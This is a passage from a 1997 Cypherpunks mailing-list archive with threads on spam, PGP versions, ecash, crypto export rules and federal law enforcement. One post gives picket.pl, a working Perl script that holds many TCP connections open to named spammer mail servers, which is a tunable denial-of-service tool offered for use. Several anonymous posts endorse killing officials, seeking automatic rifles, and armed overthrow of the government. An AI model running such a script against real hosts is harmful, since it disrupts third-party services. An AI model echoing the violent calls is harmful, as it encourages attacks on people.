1JsvVOfaV8bnLMYNQZoJjXtskcIlxKVTQ0upwODgr1HCXTyJHVlkatQLcDagoIfe OIh6i6/VJd8= =gSv3 -----END PGP SIGNATURE----- From aba at dcs.ex.ac.uk Sun Aug 17 06:33:58 1997 From: aba at dcs.ex.ac.uk (Adam Back) Date: Sun, 17 Aug 1997 21:33:58 +0800 Subject: picket.pl (was Re: Picketing With Packets) In-Reply-To: <19970816212754.10722.qmail@zipcon.net> Message-ID: <199708171319.OAA03207@server.test.net> Mike Duvos writes: > We write a little Perl script that keeps exactly ONE AND ONLY ONE > TCP connection open to each of Mr. Spamford's machines. Keeping a > single TCP connection open to someone's box is unlikely to be > illegal, and does not constitute a Denial of Service attack. > Consider it the packet equivalent of a single person picketing. Sounds good to me :-) Here's picket.pl. You create two files, one called "hosts" the other called "services", a hosts file of all of Spamford machines (if you have a list): answerme.com spamford.com savetrees.com and a "services" file with: smtp should do what you describe. There are a number of arguments you can play with also: % picket.pl [ [ [] ] ] is the number of sockets to hold open on each machine/service. Eg if we set this to 10, it'll try to open 10 connections to the SMTP port at savetrees.com. (Defaults to 1) is the maximum number of connections to hold open (you might want some left for your own use :-). Linux seemed to merrily go over 256 though I think some unixes will give you a per user limit of around 256. (Defaults to 100). is how long to wait before closing and reopening all the descriptors. (Defaults to 1 minute). For example: % picket.pl 10 100 600 would open 10 connections on each port, would consume 100 socket descriptors locally, and would wait 10 mins before closing them and starting over. Adam ==============================8<============================== #!/usr/local/bin/perl -s ($num, $max, $sleep) = @ARGV; if (!defined($num)) { $num = 1; } # try to open 1 socket on each service if (!defined($max)) { $max = 100; } # use this many file descriptors if (!defined($sleep)) { $sleep = 60; } # repeat after this time in seconds use Socket; $proto = getprotobyname( "tcp" ); $count = 0; $/ = undef; open( SERVICES, "services" ) || die( "can't open services\n" ); chop( @service = ); close( SERVICES ); open( HOSTS, "hosts" ) || die( "can't open hosts\n" ); chop( @hosts = ); close( HOSTS ); while ( 1 ) { foreach $host ( @hosts ) { foreach $service ( @service ) { foreach ( 1..$num ) { stuff( $host, $service ); if ( $v ) { print "fd[$count] = connect( $host:\U$service )\n"; } } } } sleep( $sleep ); } sub stuff { my( $host, $service ) = @_; my( $sock, $port, $ipaddr, $addr ); $sock = "SOCK$count"; $count = ($count + 1) % $max; close( $sock ); $port = getservbyname( $service, "tcp" ); socket( $sock, PF_INET, SOCK_STREAM, $proto ); $ipaddr = inet_aton( $host ); $addr = sockaddr_in( $port, $ipaddr ); connect( $sock, $addr ); } #==============================8<============================== From shamrock at netcom.com Sun Aug 17 06:41:00 1997 From: shamrock at netcom.com (Lucky Green) Date: Sun, 17 Aug 1997 21:41:00 +0800 Subject: Missed a PGP version? In-Reply-To: <199708171239.FAA05942@f31.hotmail.com> Message-ID: <3.0.2.32.19970817062449.006fd06c@netcom10.netcom.com> At 05:39 AM 8/17/97 PDT, David Downey wrote: > The version numbers of PGP floated from PGP 2.63i to PGP 5.0i. Did I >miss a version or was this done to reflect the start of the break from >the RSALIB algorythm? Also, does PGP 5.0 still support the MPLIB? Was it >used in it's design? PGP 5.0 is the software formerly known as PGP 3.0. Viacrypt, which sold commercial PGP licenses before PGP, Inc. was formed, used to sell a PGP 4.x GUI version based on 2.63 core. Rather than trying to explain to their customers why 3.0 was more advanced than 4.5, PGP, Inc decided to name the rewrite 5.0. --Lucky Green PGP encrypted mail preferred. DES is dead! Please join in breaking RC5-56. http://rc5.distributed.net/ From TheeInterNet at hotmail.com Sun Aug 17 07:01:22 1997 From: TheeInterNet at hotmail.com (TheeInterNet at hotmail.com) Date: Sun, 17 Aug 1997 22:01:22 +0800 Subject: mediated capital spectacular enemy Message-ID: <199708171658.QAA10512@server.imsday.com> Thee InterNet is not a collection of machines, but a social relation among people, *mediated* by nothing. Thee InterNet is *capital* to such a degree of accumulation that it becomes a machine. Thee InterNet which eliminates all geographical distance reproduces distance internally as *spectacular* separation. InterNet theory is now the *enemy* of all InterNet ideology and knows it. From anon at anon.efga.org Sun Aug 17 10:15:39 1997 From: anon at anon.efga.org (Anonymous) Date: Mon, 18 Aug 1997 01:15:39 +0800 Subject: Armed and dangerous Message-ID: August 15, 1997 Armed and dangerous Federal agencies expanding use of firepower Related Items Joseph Farah's Between the Lines Which major agencies carry firearms Where the increases have occurred All 32 federal agencies packing heat By Sarah Foster WorldNetDaily.com During the late morning of January 14, 1997, 20 heavily armed federal agents and local sheriff's deputies descended from a military helicopter onto rocky Santa Cruz Island off the California coast. As snipers moved into position along the ridge tops to secure the perimeter of the attack area, other agents staged dynamic entries into the buildings -- rousting 15-year-old Crystal Graybeel who was sleeping late in her cabin. "They started screaming, 'Put your hands where we can see them.' They unzipped my sleeping bag. I had to get face down on the floor and they handcuffed me," the teenager said. She recalled the intruders wore ski masks and carried machine guns. They kept her handcuffed for two hours. The target of the raid? A 6,500-acre bow-and-arrow hunting ranch, the last bastion of private property on the island. The raid resulted in three arrests -- volunteer Rick Berg, 35, and caretakers Dave Mills, 34, and Brian Krantz, 33 -- on suspicion of robbing Chumash Indian graves and taking human remains and artifacts, charges they denied. The agency responsible for all this was not the Bureau of Alcohol, Tobacco and Firearms, nor the FBI, nor any other agency typically associated with such "dynamic entries." This raid was the work of the National Park Service. Surprised? So were local residents. Though no lives were lost, the raid inspired a firestorm of protest. "It saddens me that the Park Service has resorted to Ruby Ridge tactics," said Marla Daily, president of the Santa Cruz Island Foundation, referring to the September 1992 standoff between the FBI and Randy Weaver that resulted in the death of Weaver's wife. "This incident clearly crosses the line," Daily said. If the use of the Park Service in commando-style operations seems strange, it shouldn't. At a time when elected legislative bodies from city councils to Congress -- have been passing laws that restrict the rights of law-abiding citizens to keep and bear arms, federal agencies within the executive branch have been quietly authorizing dramatically increased numbers of armed personnel -- often heavily armed with military-style assault weapons. Today, there are nearly 60,000 federal agents trained and authorized to enforce the over 3,000 criminal laws Congress has passed over the years, plus the hundreds of thousands of regulations which now carry criminal penalties. "Good grief, that's a standing army," said Larry Pratt of Gun Owners of America. "It's outrageous." According to a recent report from the General Accounting Office, as of last September, the number of law enforcement personnel stood at just under 50,000 -- distributed through 45 agencies -- an increase of about 12,000 agents in 10 years with 2,436 added in 1996 alone. These are full-time agents, authorized to execute searches, make arrests, and/or carry firearms "if necessary." But that number is not complete. When some 7,145 Customs inspectors and 317 Customs Department pilots are added -- all of whom have the above listed law enforcement powers -- the total is pushing 60,000. Why doesn't the GAO count them? Not because they aren't armed and dangerous, but because they have different retirement benefits. Also, a GAO staff consultant explained that the report doesn't include contract personnel or personnel from agencies with less than 25 officials in law enforcement -- which is why some agencies, the Federal Emergency Management Agency, for example, aren't on the list. The recent GAO report is the third and final in a series requested by Rep. Bill McCollum, R-Florida, chairman of the House Subcommittee on Crime, to gather information on agencies charged with investigating violations of federal law. An earlier report, released last year and presenting figures through Sept. 30, 1995, dealt with the 13 biggest agencies -- those with 700 or more investigative personnel. Not surprisingly, the FBI topped the list with over 10,000 agents, followed by the INS, Drug Enforcement Administration, and the U.S. Marshalls Service -- all in the Department of Justice. Treasury agencies follow -- the Internal Revenue Service, U.S. Secret Service, Customs, BATF and the Postal Inspection Service. Then the National Park Service, U.S. Capitol Police, the Naval Criminal Investigative Service and the Bureau of Diplomatic Security in the State Department. Some key findings of that report: * Ten of the 13 agencies employ over 90 percent of all law enforcement investigative personnel: 38,739. * Between the end of fiscal years 1987 and 1995, there was a 19 percent increase in law enforcement personnel in the 13 agencies. * As of Sept. 30, 1995, the 13 agencies employed about 42,000 investigative agents. A year later, according to the recent GAO report, it was over 45,000. The pace shows no sign of slackening. The final report deals with the 32 agencies that employ about 9 percent of the law enforcement personnel. It's among these 32 that you'll find the U.S. Fish and Wildlife, EPA's Office of Criminal Enforcement, Forensics and Training, the Bureau of Land Management's Law Enforcement division and other law enforcement bodies not usually traditionally with guns. Yet, the proliferation of firearms is even greater in these agencies: from a total of 2,471 law enforcement employees in 1987 to 4,204 as of Sept. 30 last year, a 70 percent increase. But beyond the flat figures loom questions of how agencies are using, or abusing, the powers they have in everyday law enforcement. Sting operations and other entrapment tactics, hidden-camera surveillance, phone tapping -- these have become commonplace practices in the name of investigation. So, too, has the use of dynamic entry teams -- the kind witnessed at Waco and Ruby Ridge. David Kopel, director of the free-market Independence Institute in Golden, Colorado, is an outspoken critic of the usurpation of local and state police authority by the federal government and the growing use of violence in law enforcement. According to Kopel, the FBI has 56 SWAT teams that "specialize in confrontation rather than investigation, even though investigation is, after all, the very purpose of the bureau." "Whereas (J. Edgar) Hoover's agents wore suits and typically had a background in law or accounting, SWAT teams wear camouflage or black ninja clothing and come from a military background," he said. "They are trained killers, not trained investigators." Even worse, other agencies are trying to match "FBI swashbucklers." BATF, DEA, U.S. Marshalls Service, even the National Park Service and Department of Health and Human Services -- all have their own SWAT teams. Contacted by telephone, Kopel said he was "not shocked " at the growing size of the community of federal law enforcement personnel as reported by the GAO, "in light of the trends over the past 20 years." "Of course," he added, "it would have astonished and frightened the authors of our Constitution." "There's a continuing imperative (for an agency) to get power, and they'll come back again and again until they get it," says Eric Sterling, president of the Washington-based Criminal Justice Policy Foundation and a counsel for the House Judiciary Committee in the 1980s. Sterling, who describes himself as a liberal, is particularly alarmed by the arming of agencies with military weapons, such as machine-guns. "The machine-gun is an indiscriminate weapon, and is singularly inappropriate for the FBI and other agencies," he said. "Its use by a government agency is a horrifying prospect." In full agreement is Greg Lojein, legislative counsel for the American Civil Liberties Union. He deplores not only the expansion of the federal law enforcement, but the lack of constraining mechanisms. "Local police are subjected to review (by civilian boards), but not federal agents," he noted. "When the Department of Justice investigates (an agency incident), the results are not nearly as trustworthy as when an independent entity investigates. Just ask Richard Jewell about this." Lojein called attention not only to the procurement of military weapons themselves, but to the acquisition of heavy equipment such as military helicopters and tanks as well -- "heavy equipment," he said, "more characteristic of war than of law enforcement." "The last thing people want to see is a tank on a city street," he said. "That's what you expect to see in Bosnia, but not in Boston." Kopel sees the federalization of law enforcement and the growth of the FBI as parts of a larger effort to establish a national police force. He cites in particular the involvement of the FBI in local law enforcement. "Besides traffic tickets, there aren't many crimes where the FBI isn't involved in the prosecution," he said. Eventually, he predicts, federal law enforcement agencies will be merged --beginning by moving the Treasury agencies under the control of the Justice Department, as Al Gore has recommended. "But a separation of powers is at least a small check on the movement towards total police power consolidation and keeps them from going completely overboard," said Kopel. Others are concerned that the militarization of the federal government has already gone too far -- that once-benign agencies have been given incentives to become armed and dangerous. The raid at Santa Cruz, for instance, wasn't the first for the Park Service. It wasn't even the most horrific in terms of outcome. Just one month after the Weaver debacle at Ruby Ridge, Malibu millionaire Donald Scott was gunned down in his home in a mid-morning assault involving 14 agencies, including NASA, Immigration and Naturalization Services and the L.A. County Sheriff's Department. The alleged reason for the attack was that Scott was suspected of growing marijuana. None was found. There, as at Santa Cruz Island, the lead agency was the NPS; and there, too, the real reason was to acquire Scott's estate for the Park Service. At Santa Cruz, the National Park Service had been trying to obtain the 6,500-acre ranch -- which covers 10 percent of the island. The Nature Conservancy owns the other 90 percent. The three arrests occurred as the National Park Service had obtained orders from Congress to seize the ranch. From stewarts at ix.netcom.com Sun Aug 17 11:48:57 1997 From: stewarts at ix.netcom.com (Bill Stewart) Date: Mon, 18 Aug 1997 02:48:57 +0800 Subject: Picketing With Packets In-Reply-To: <19970816212754.10722.qmail@zipcon.net> Message-ID: <3.0.2.32.19970817111704.030651c4@popd.ix.netcom.com> At 02:27 PM 8/16/97 -0700, Mike Duvos wrote: >I availed myself of some free home page enhancements on the Web >yesterday, and all of a sudden, my SPAM has increased by at least >an order of magnitude. Obviously, one or more of the sites I >visited sold my email address to Mr. Spamford. Not obvious at all - spammers have harvester programs that hunt down new web pages to find spammer targets, and since three of the different spammer groups are hitting you, that's probably what happened. >The following was suggested to me by someone on IRC this morning, >and I think it's a pretty nifty idea. We write a little Perl >script that keeps exactly ONE AND ONLY ONE TCP connection open to >each of Mr. Spamford's machines. Perl is a nice language to write such things in, but you won't get huge quantities of people implementing it, except perhaps Linux users. You need an executable that'll run on Win3.1 or Win95 (sigh); a user interface letting you input different targets is also good. However, that doesn't really block the spammers who buy a list of N million targets and send spam out from their own machines, though shutting down Spamford and Harris Marketing would help, and would cut down the sales of the lists. # Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # You can get PGP outside the US at ftp.ox.ac.uk/pub/crypto/pgp # (If this is a mailing list or news, please Cc: me on replies. Thanks.) From anon at anon.efga.org Sun Aug 17 11:52:11 1997 From: anon at anon.efga.org (Anonymous) Date: Mon, 18 Aug 1997 02:52:11 +0800 Subject: Death to Tyrants (was Re: ASSETS FORFEITURE BILL ON THE MOVE) Message-ID: At 09:07 AM 8/17/97 +0200, you wrote: > Is it time to kill these fuckers, yet? I reckon so. Anybody here know of a nice place to aquire Automatic Rifles? On the note of fascist bills, I can't wait to see the next one... The "Feline Rape and Forfeiture" bill, allowing police to steal your cat, detain it, and rape it, if they please. > Does anybody know what the secret signal is for us to descend >on D.C. en masse and slaughter every living soul in the defense >of freedom? (or merely on a whim?) I believe it's the middle finger. Lock and load Gentlemen. FreedomMonger "There's something good about several crazed Cypherpunks charging the WhiteHouse with Automatic Rifles." From stewarts at ix.netcom.com Sun Aug 17 12:01:38 1997 From: stewarts at ix.netcom.com (Bill Stewart) Date: Mon, 18 Aug 1997 03:01:38 +0800 Subject: Getting ecash without an MTB account In-Reply-To: Message-ID: <3.0.2.32.19970817112235.030651c4@popd.ix.netcom.com> At 03:15 PM 8/15/97 -0400, Mark M. wrote: >There are two ways of handling the double spending problem. One is online >clearing where the bank keeps a database of all deposited coins. ..... >The other protocol is very complex and involves an interactive protocol >to reveal one half of the payer's identity which is split using a simple >XOR. When a coin is double spent using this protocol, the payer's identity >is revealed. I don't know if this protocol can be used for double-blinded >coins, but even if it could, there wouldn't be many advantages over >online clearing. The advantage is that it doesn't need to be online, and being online is sometimes inconvenient, and sometimes increases your transaction costs. For some applications, such as wallets, being online means trusting the telecom facilities provided by the person you're exchanging money with, which also requires more protocol support. There is another approach, which is the observer stuff from Stefan Brands, or whatever he's working on these days, using some sort of "trusted" processing component in the wallet to prevent double-spending. # Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # You can get PGP outside the US at ftp.ox.ac.uk/pub/crypto/pgp # (If this is a mailing list or news, please Cc: me on replies. Thanks.) From stewarts at ix.netcom.com Sun Aug 17 12:27:33 1997 From: stewarts at ix.netcom.com (Bill Stewart) Date: Mon, 18 Aug 1997 03:27:33 +0800 Subject: Comments on PGP5.0 OCR (was Re: fyi, pgp source now available , internationally) In-Reply-To: Message-ID: <3.0.2.32.19970817120702.006fa20c@popd.ix.netcom.com> At 03:21 PM 8/11/97 -0400, tzeruch - at - ceddec - dot - com wrote: >Not quite. If you read closely, the EAR says something about reserving >judgment on OCR publications. You didn't use a specific OCR font, but you >did put all kinds of other OCR helps in, which should by itself cloud the >issue. It would be nice if it was resolved. Of course they say the "reserve judgement" - they'd really like to control it, but they know their chances of getting it past the First Amendment are extremely low, so it's just FUD. I thought the PGP source code was printed in nice, friendly OCR-B font, but OCR equipment is good enough that Courier 10 or random popular fonts from Laserjets will do. (Proportional spaced is still a bit harder to recognize than constant-width, but not by much.) Reading text typed on an IBM Selectric was practical 10 years ago, when cheap ($10K) 68000-based OCR machines were starting to come out which weren't made by Kurzweil (who made great $30K machines.) If they want to block OCR-readable stuff, they're blocking just about everything printed today. # Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # You can get PGP outside the US at ftp.ox.ac.uk/pub/crypto/pgp # (If this is a mailing list or news, please Cc: me on replies. Thanks.) From rah at shipwright.com Sun Aug 17 12:41:01 1997 From: rah at shipwright.com (Robert Hettinga) Date: Mon, 18 Aug 1997 03:41:01 +0800 Subject: Hettinga's e$yllogism In-Reply-To: <199706222256.RAA10176@mailhub.amaranth.com> Message-ID: At 11:57 pm -0400 on 6/22/97, Tim May wrote: > >In <199706222220.AAA26096 at basement.replay.com>, on 06/23/97 > > at 12:20 AM, nobody at REPLAY.COM (Anonymous) said: > > > >>> Digital Commerce *is* Financial Cryptography, > >>> Financial Cryptography *is* Strong Cryptography, > >>> therefore, > >>> Digital Commerce *is* Strong Cryptography. > >>> and, therefore, > >>> No Strong Cryptography, no Digital Commerce. > > > >>Why can't escrowed ecash support digital commerce? Strong crypto with a > >>government backdoor. That's what you're offered. Prove it can't work. First of all, Anonymous, proving a negative is logically impossible. :-). Second of all, in general, escrow is H1, and strong crypto, the status quo, is H0, so it's up to *proponents* of escrow to prove that it'll have the same, or actually significantly better, results, than strong crypto would. The same thing holds true for bearer certificates, in general. The difference in cost between traceable and and anonymous digital bearer certificate technology is lost in the noise of the enormous benefit of not using book-entries for transaction settlement anymore. Since they're the same price, and anonymous bearer certificates are more secure, people will probably select anonymous certificate protocols for the extra security. Okay, now on to Tim... > I agree with "anonymous" that Bob Hettinga's syllogism is unconvincing. *This* should be fun... > Now, I happen to believe that untraceable, strong communications and > monetary instruments allow for amazing things. Amen. I also expect that the very definition of "amazing" will be in greater utility (horrors!) to mankind. Progress, in other words. Which, of course, is defined almost any way you cut it as more stuff for less work, and which is usually measured in the price of things on an open market. (Yes, I know. Money isn't everything, and freedom is probably the most important thing there is. However, in a literal sense, freedom is not priceless. It must be paid for. Fortunately, since people demand it so much, progress can also reduce the price of freedom, just like it does with other goods. :-).) > But claiming that digital commerce is impossible with an escrowed key > system is not a very persuasive argument. One only needs to see the recent IBM FUDomercial about fear of commerce on the net, or any of the other equivalent niggling stuff in the press on digital commerce, to give the lie to that argument. Again, if there's no material difference between the cost of weak cryptography and strong cryptography, which one are you going to choose? Occam's razor, and all that. We've demonstrated time and time again that the cost of audit trails in book entries is necessary for non-repudiation. "And then you go to jail" is the error-handler we all have to live with in our transaction architecture, because we couldn't move paper bearer certificates down a wire, and storage of paper costs more money than numbers in a book or database. We pay for that enforcement "subroutine" with taxes. With bearer certificates, none of that cost, database storage, access/authentication -- or law enforcement -- is necessary. If you *do* want audit trails with bearer certificates, you have to put them back in as some type of kludge. Or, even if you figure out how to leave them out, like Dan Simon did, you gain no material cost advantage over anonymous certificates. So why do it? Just 'cause the government wants it isn't an answer. Nation states have always wanted to do lots of things which are economically impossible, and those things haven't happened either. Reality is not optional. > (It is true that some major hacks > of the escrowed system would undermine confidence in e-commerce, but so > would major hacks of today's SWIFT or similar systems. So?) Well, I've already answered this using, horrors, utilitarian arguments, but, directly on the merits of your argument, the most sweeping commerce protocols will be peer-to-peer ones, checks, cash, and the like. That leaves a lot of points of weakness to the system. Not the least of which would be any central place where the transactions are reported. Theft could be done unobtrusively and on a large scale, and the nagging fear of that is exactly what stuff like the IBM FUDomercial preys on, causing a "chilling" effect on commerce in general. The answer is strong cryptography, which costs the same anyway. So, Financial Cryptography is Strong Cryptography. > Bob's syllogism is just too simplistic, and it won't be convicing to people > who have to deal with human weak links in existing systems, and even with > government interference and government ability to intervene (FinCEN, > freezing of assets, regulation, etc.). They can do all they want, but eventually, it boils down to whether strong cryptography makes more money than weak crypto. I'm firmly convinced that that is the case. Hence the syllogism. > Beware too much simplification. It may make for nice t-shirts, but.... Frankly, simple is usually right. Progress in science is usually about replacing klunky complex ideas with more simple and elegant ones. Einsteinian space-time distortion is simple to visualize, so too is the double helix, or Newton's Laws, or the efficient market hypothesis, or Coase's stuff. Complexity is usually a symptom of cluttered and thus ineffective theory. Otherwise, we'd still be calculating orbits with epicycles... Occam's Razor. It's not just a good idea, it's the only idea. :-). Cheers, Bob Hettinga ----------------- Robert Hettinga (rah at shipwright.com), Philodox e$, 44 Farquhar Street, Boston, MA 02131 USA "... however it may deserve respect for its usefulness and antiquity, [predicting the end of the world] has not been found agreeable to experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire' The e$ Home Page: http://www.shipwright.com/ From rah at shipwright.com Sun Aug 17 12:44:36 1997 From: rah at shipwright.com (Robert Hettinga) Date: Mon, 18 Aug 1997 03:44:36 +0800 Subject: Canarypunk: Jim Bell in a coalmine In-Reply-To: <3.0.32.19970622234946.00af1174@cnw.com> Message-ID: Okay. So we know that Bell has pled, and he's in there for a while. How long until he gets out, now? Has he moved to another facility? Is all this moot because he's admitting to something which is not related to his activities on this list? If I remember, his A/P rant here was still pretty central to the Feds' case, right? At 2:51 am -0400 on 6/23/97, Blanc wrote: > I live about an hour's drive from Tacoma. I'm not too enthused about > taking such a lengthy trip just to go see how Mr. Private Assassinations is > doing, but - taking after your own methods, Robert - I'd be glad to do it > in exchange for a trip to Anguilla next Feb. :>) Well, if he's still in there, and Vince Cate is up for it, we can probably give you a scholarship, which, for FC98, means we let you in the door free. Unfortunately, we're not quite in the business of flying people down to Anguilla and putting them up, just yet, so you're still going to have to get there under your own power. Also, this would be a one shot deal, in that we couldn't really do this for anyone else. First person(s) to the train locker, and all that. Mostly it's to show that I, and maybe Vince, if not the rest of the FC++ organization, realize that there, for the grace of the net, go us, too, someday, if we don't do something to show that people like Jim Bell, however loony or repugnant their ideas are to us personally, are not alone. > (You know, it is true that having friends in times of stress, like when > you're sitting in jail, is good for the soul, but on the other hand one > must give credit to Jim for his having created his own situation. He did > provoke the government types into suspicions about him and he must have > known that distributing his AP ideas, containing such apparent potential > for being translated into reality, would make him a grand target. When > you do things like that, you ought to consider what you're going to do when > "they" come after you. He afterall is quite aware of the atmosphere in > which we live and how fragile is the relationship (if it can be called > that) which civilians have with the local military saviors which daily > protect us from ourselves.) I think we're all guilty of that, myself. Frankly, every subscriber to this list has said things, probably on this very forum, which can be used, if not now, then someday, to politically incarcerate them. Cockroaches scatter in the presence of light, however. So maybe it's time to shine a little light into the coal mine and see if the canary still breathes... I also agree that simple speech is probably not what got Mr. Bell into jail. However, he is the first cypherpunk to go to jail for talking about what is an inherently cypherpunk idea. Not to mention a somewhat plausible application of financial cryptography. :-). > Having said that, I'll consider the possibility, if visitors are allowed on > weekends. Perhaps several cpunks could go (if anyone else around here > interested? (Wei, Joel, I know you're just dying to go )), if more than > one visitor at a time is allowed . Let Vince and I know how many people are going with you. We can't go giving free badges to everyone who visits Bell in jail, but we can sweeten the pot with a few FC98 tickets to committed cypherpunks who might not go to FC98 -- or to see Bell, for that matter -- otherwise. Cheers, Bob Hettinga ----------------- Robert Hettinga (rah at shipwright.com), Philodox e$, 44 Farquhar Street, Boston, MA 02131 USA "... however it may deserve respect for its usefulness and antiquity, [predicting the end of the world] has not been found agreeable to experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire' The e$ Home Page: http://www.shipwright.com/ From alan at ctrl-alt-del.com Sun Aug 17 12:49:57 1997 From: alan at ctrl-alt-del.com (Alan) Date: Mon, 18 Aug 1997 03:49:57 +0800 Subject: Comments on PGP5.0 OCR (was Re: fyi, pgp source now available , internationally) In-Reply-To: <97Aug11.152045edt.32259@brickwall.ceddec.com> Message-ID: <3.0.2.32.19970817123535.04265df0@ctrl-alt-del.com> At 12:07 PM 8/17/97 -0700, Bill Stewart wrote: > >At 03:21 PM 8/11/97 -0400, tzeruch - at - ceddec - dot - com wrote: > >>Not quite. If you read closely, the EAR says something about reserving >>judgment on OCR publications. You didn't use a specific OCR font, but you >>did put all kinds of other OCR helps in, which should by itself cloud the >>issue. It would be nice if it was resolved. > >Of course they say the "reserve judgement" - they'd really like to >control it, but they know their chances of getting it past the >First Amendment are extremely low, so it's just FUD. It is pretty absurd any way you look at it. Most text scanning jobs for commercial use are sent off-shore. For the government to act like OCR scanning does not exist for those off the continental US is absurd. >I thought the PGP source code was printed in nice, friendly OCR-B font, >but OCR equipment is good enough that Courier 10 or random popular >fonts from Laserjets will do. (Proportional spaced is still a bit >harder to recognize than constant-width, but not by much.) >Reading text typed on an IBM Selectric was practical 10 years ago, >when cheap ($10K) 68000-based OCR machines were starting to come out >which weren't made by Kurzweil (who made great $30K machines.) >If they want to block OCR-readable stuff, they're blocking just about >everything printed today. I used to work for a company that made CD-ROMs of medical journals. These were proportional fonts out of magazines. (Once in a while we would get the origianl article information, but that was not always assured.) Most of the text would be sent to somewhere in Asia to be scanned and proofread. Text scanning is big business in some parts of SE Asia. (And has for many years.) Goes to show you just how disconnected from the real world the White House and its fellow travelers have become. --- | "That'll make it hot for them!" - Guy Grand | |"The moral PGP Diffie taught Zimmermann unites all| Disclaimer: | | mankind free in one-key-steganography-privacy!" | Ignore the man | |`finger -l alano at teleport.com` for PGP 2.6.2 key | behind the keyboard.| | http://www.ctrl-alt-del.com/~alan/ |alan at ctrl-alt-del.com| From whgiii at amaranth.com Sun Aug 17 13:20:36 1997 From: whgiii at amaranth.com (William H. Geiger III) Date: Mon, 18 Aug 1997 04:20:36 +0800 Subject: Comments on PGP5.0 OCR (was Re: fyi, pgp source now available , internationally) In-Reply-To: <3.0.2.32.19970817123535.04265df0@ctrl-alt-del.com> Message-ID: <199708172002.PAA09041@mailhub.amaranth.com> -----BEGIN PGP SIGNED MESSAGE----- In <3.0.2.32.19970817123535.04265df0 at ctrl-alt-del.com>, on 08/17/97 at 12:35 PM, Alan said: >Goes to show you just how disconnected from the real world the White >House and its fellow travelers have become. I doubt that you would find anyone outside of the beltway that didn't know that DC was out of touch with the rest of the world (and reality for that matter). They are all living in there own little fantasy world there; unfortunately people are dieing in the real world because of it. - -- - --------------------------------------------------------------- William H. Geiger III http://www.amaranth.com/~whgiii Geiger Consulting Cooking With Warp 4.0 Author of E-Secure - PGP Front End for MR/2 Ice PGP & MR/2 the only way for secure e-mail. OS/2 PGP 2.6.3a at: http://www.amaranth.com/~whgiii/pgpmr2.html - --------------------------------------------------------------- -----BEGIN PGP SIGNATURE----- Version: 2.6.3a Charset: cp850 Comment: Registered_User_E-Secure_v1.1b1_ES000000 iQCVAwUBM/dLF49Co1n+aLhhAQHw1gQAkaVr5bGpe4YURkOtdtpcTZp6Uw7sq2RO tcRbMy0RC1O19RxfnJQM4yIzoZZAq26ggnHt9vVw07xrME/ywmzysoOaUdpbRF6U V+1iVV5Q2bIfJ6ImvAlrLu+N9bNpDIWF1U0glyXcAhrVPOGZ9yyownpNmCHk3WWO 2zm7pphaXEQ= =wvD8 -----END PGP SIGNATURE----- From shamrock at netcom.com Sun Aug 17 13:27:17 1997 From: shamrock at netcom.com (Lucky Green) Date: Mon, 18 Aug 1997 04:27:17 +0800 Subject: Comments on PGP5.0 OCR (was Re: fyi, pgp source now available , internationally) In-Reply-To: <3.0.2.32.19970817120702.006fa20c@popd.ix.netcom.com> Message-ID: <3.0.2.32.19970817131546.006e100c@netcom10.netcom.com> At 12:35 PM 8/17/97 -0700, Alan wrote: >I used to work for a company that made CD-ROMs of medical journals. These >were proportional fonts out of magazines. (Once in a while we would get >the origianl article information, but that was not always assured.) Most >of the text would be sent to somewhere in Asia to be scanned and proofread. > Text scanning is big business in some parts of SE Asia. (And has for many >years.) > >Goes to show you just how disconnected from the real world the White House >and its fellow travelers have become. I watched the attorney for the USG claim in federal court during the recent Bernstein hearing that foreigners were incapable of retyping or scanning in crypto source code. He stated that even retyping the source for DES was too difficult to be done successfully. I couldn't help but groan. Luckyly, the judge wasn't nearly as stupid as I had feared. She knew that he was trying to snow her. --Lucky Green PGP encrypted mail preferred. DES is dead! Please join in breaking RC5-56. http://rc5.distributed.net/ From remailer at bureau42.ml.org Sun Aug 17 13:38:18 1997 From: remailer at bureau42.ml.org (bureau42 Anonymous Remailer) Date: Mon, 18 Aug 1997 04:38:18 +0800 Subject: None Message-ID: At 01:03 PM 8/17/97 -0400, Anonymous wrote: >"They started screaming, 'Put your hands where we can see them.' They >unzipped my sleeping bag. I had to get face down on the floor and they >handcuffed me," the teenager said. She recalled the intruders wore ski >masks and carried machine guns. They kept her handcuffed for two hours. Nazi Fascism at work. Legalized thugs, the NEW brownshirts. >The target of the raid? A 6,500-acre bow-and-arrow hunting ranch, the last >bastion of private property on the island. The raid resulted in three >arrests -- volunteer Rick Berg, 35, and caretakers Dave Mills, 34, and >Brian Krantz, 33 -- on suspicion of robbing Chumash Indian graves and >taking human remains and artifacts, charges they denied. All that shit to arrest some guys who may or may not have taken things from graves??? Someone explain to me how we need to have people with Automatic Weapons arrest some guys for a trivial crime? Nazi Fascism at work. >The agency responsible for all this was not the Bureau of Alcohol, Tobacco >and Firearms, nor the FBI, nor any other agency typically associated with >such "dynamic entries." This raid was the work of the National Park >Service. You've gotta be shitting me. Forest Rangers with Automatic Weapons????? I'd hate to see what they'd do to a guy lighting a match in a forest camping ground. >Surprised? So were local residents. Though no lives were lost, the raid >inspired a firestorm of protest. "It saddens me that the Park Service has >resorted to Ruby Ridge tactics," said Marla Daily, president of the Santa >Cruz Island Foundation, referring to the September 1992 standoff between >the FBI and Randy Weaver that resulted in the death of Weaver's wife. "This >incident clearly crosses the line," Daily said. This incident demands armed rebellion and government overthrow. It demands people going to parks to carry automatic or semi-automatic rifles. >If the use of the Park Service in commando-style operations seems strange, >it shouldn't. At a time when elected legislative bodies from city councils >to Congress -- have been passing laws that restrict the rights of >law-abiding citizens to keep and bear arms, federal agencies within the >executive branch have been quietly authorizing dramatically increased >numbers of armed personnel -- often heavily armed with military-style >assault weapons. If this isn't pure evidence of preparing a takeover of fascist forces, then i don't know what its. >Today, there are nearly 60,000 federal agents trained and authorized to >enforce the over 3,000 criminal laws Congress has passed over the years, >plus the hundreds of thousands of regulations which now carry criminal >penalties. This is another big leap past what our Founders intended. >"Good grief, that's a standing army," said Larry Pratt of Gun Owners of >America. "It's outrageous." Then it's time for all citizens of this country who love freedom to form a militia, controlled by citizens. Arm yourselves. >According to a recent report from the General Accounting Office, as of last >September, the number of law enforcement personnel stood at just under >50,000 -- distributed through 45 agencies -- an increase of about 12,000 >agents in 10 years with 2,436 added in 1996 alone. These are full-time >agents, authorized to execute searches, make 